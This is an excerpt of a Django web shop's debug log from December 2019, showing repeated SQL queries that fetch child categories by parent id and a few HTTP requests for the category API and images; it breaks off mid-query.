DEBUG 2019-12-20 05:33:20,744 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:33:20,748 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:33:20,750 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:33:20,753 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:33:20,756 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:33:20,759 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:33:20,761 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:33:20,763 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:33:20,766 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:33:20,769 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:33:20,772 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:33:20,776 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:33:20,779 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:33:20,782 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:33:20,786 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:33:20,788 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:33:20,790 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:33:20,793 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:33:20,795 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:33:20,797 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:33:20,801 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:33:20,803 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:33:20,806 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:33:20,808 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:33:20,810 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:33:20,814 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:33:20,816 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:33:20,818 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:33:20,820 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:33:20,823 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:33:20,826 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:33:20,829 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:33:20,832 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:33:20,836 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:33:20,839 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:33:20,842 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:33:20,846 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:33:20,850 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:33:20,854 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:33:20,857 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:33:20,859 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:33:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 05:33:21] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 05:33:21] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [20/Dec/2019 05:37:59] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 05:38:25,819 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:38:25,831 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:38:25,838 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:38:25,842 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:38:25,848 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 05:38:25,852 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:38:25,856 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:38:25,860 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:38:25,864 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:38:25,870 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:38:25,874 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:38:25,878 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:38:25,882 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:38:25,886 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:38:25,895 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:38:25,899 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:38:25,903 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:38:25,909 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:38:25,913 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:38:25,920 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:38:25,924 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:38:25,928 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:38:25,932 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:38:25,937 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:38:25,941 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:38:25,949 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY 